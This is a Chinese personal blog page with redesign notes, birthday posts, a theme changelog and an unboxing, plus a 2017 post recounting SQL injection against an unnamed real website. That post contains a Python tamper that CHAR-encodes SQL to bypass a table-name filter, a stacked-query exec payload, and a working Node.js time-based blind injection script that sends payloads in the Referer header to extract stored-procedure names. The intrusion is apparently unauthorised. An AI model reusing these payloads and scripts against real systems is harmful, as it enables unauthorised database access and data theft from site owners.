贫困的蚊子

亦余心之所向兮,虽九死其尤未悔


Explore Me
贫困的蚊子
亦余心之所向兮,虽九死其尤未悔
83
9
634

所以说不能光是把博客挪到子域名来就算改版了啊

不过不管怎么说我都是写了个新的index

首页动画灵感来源于兰陵大佬的 《害怕高清3D重置》 这个作品(非原作地址注意)

虽说他博客好像打不开了,不过还是要贴一下的 https://blog.thkira.com/

调transform3D真的很痛苦,不过做出来效果很棒,代码都是自己写的,只是灵感而已,灵感哦!

参考一丢丢了地瓜大佬的首页,虽然大概看不出共同点,但是就是看了他的首页才让我萌生出自己也写一个的念头来

大概...就是这么多?

最近还有在忙SoluIDC项目所以说,感觉游戏啥的都没吸引力了...Node大法好啊

还有好多想说的,但是又怠惰了,想去云游戏玩变人。

还有一个月放假,八月份跑去上海找太太和某Gay一起逛CJ面基,非常期待

(上面连用了三个还有,还有怪guna)

以上,就是写于中山图书馆的一篇脱线周记

周记 #7 - OK VERY GAY
这几天是我的生日,(4月26公历 三月十四农历),因为公历生日的时候我还在学校,就草草发了篇日志水一
4月28日 · Archeb
4·26
首先先祝自己生日快乐~今天开始我就是一个完全民事行为能力人了呢明明上课的时候想着写一大堆东西的结果坐
4月26日 · Archeb

这几天在学校,QQ被腾讯连着冻结了三次(大号小号全军覆没),然而又没有手机解冻

于是只能默默坑主题,果然效率++

本次主题更新后版本为V1.3 已经推送到GitHub,主要更新内容有

  • 添加设置:文章内页位置 和 导航栏颜色风格
  • 支持搜索功能
  • 简单的修复了一下文章切换的一些BUG
  • 扔掉了丑陋的 alert() 改为自己实现了一个 showNotify() (←戳他一下试试) 气泡
  • 文章阅读体验优化
  • 用 ← 按钮来返回开头,当当前位置已经处于开头的时候才作为返回键使用

目前主题PC端版本基本处于完成状态,未来会继续优化移动端体验~ 希望大家继续支持

SurfaceBook 2 15寸顶配开箱~
美版海淘,在卖家自提点开箱的所以拍照效果和环境都很渣~和XPS15合影!开箱~
4月14日 · Archeb
(水)某站点SQL注入手记
未分类 Archeb · 2017年11月11日

这次依旧是三位小伙伴一起行动 但是轮到我来写思路了 ╮(╯▽╰)╭那就我来呗

第一次写这类,技术也不行文笔也差,各位将就看看 ╮(╯▽╰)╭

背景设定

服务端ASP.NET 数据库SQL Server 2016 可以stack query

0x01 表名过滤Bypass

这个站点的表名全部以 xd_ 开头 ,然而有一个魔法 sql里面带有xd_就不执行了,需要绕过

于是 利用存储过程拼接SQL,利用CHAR编码SQL语句 直接exec即可

Py代码(写成tamper了)



    def chrword(word):
        ret = ''
        for i in word:
            ret += 'char('+str(ord(i))+')+'
        return '\'+'+ret[:-1]+'+\''


SQL语句


    declare @a varchar(100) set @a='【编码后的SQL语句】' exec(@a) --

大概如此就绕过了,主要是因为SQL Server不能直接把char()拼接的结果作为表名,所以要用到存储过程拼接为SQL语句

0x02 探测存储过程

Bypass了表名过滤后我们再次撞坑——无法UPDATE任何数据

小伙伴果断的判断是没有权限,然后count了一下sys.procedures后发现果然全部都在存储过程里了

这时候也不知道为什么SQLMAP的Sql-shell是出不了数据的 于是自制一个time based探测了

我写了一个简陋的NJS脚本(我不会py),探测存储过程:


    var sug = require('superagent');
    var hs=process.argv.splice(2);
    console.log('开始获取' + hs);

    //探测位数 最大50位
    var i=51;
    function findlen(i){
    var upt1 = process.uptime();
    sug
        .get('http://***')
        .set('Referer',"';if(len((select top 1 name from sys.procedures where name not in (select top " + hs + " name from sys.procedures))) >= " + i + ") waitfor delay '0:0:1';--")
        .end(function(err,sres){
            if(process.uptime()-upt1>1){
                console.log('获得数据长度:' + i);
                findstr(1,122,'',i);
            }else{
                i--;
                findlen(i);
            };
        });
    }
    findlen(i);



    function findstr(pos,zf,str,max){
    var upt1 = process.uptime();
    sug
        .get('http://***')
        .set('Referer',"';if(substring((select top 1 name from sys.procedures where name not in (select top " + hs + " name from sys.procedures))," + pos + ",1) >= '"+ String.fromCharCode(zf) +"') waitfor delay '0:0:1';--")
        .end(function(err,sres){
            if(process.uptime()-upt1>1){
                console.log('获得字符为:' + str + String.fromCharCode(zf));
                findstr(pos+1,122,str + String.fromCharCode(zf),max);
                console.log(pos + ',' + max);
                if(pos >= max){
                    console.log('获取完毕,结果是' + str + String.fromCharCode(zf));
                    process.exit();
                }
            }else{
                zf--;
                findstr(pos,zf,str,max);
            };
        });
    }

0x03

已太监 23333333333

  评论
  • 您正在回复给 Poi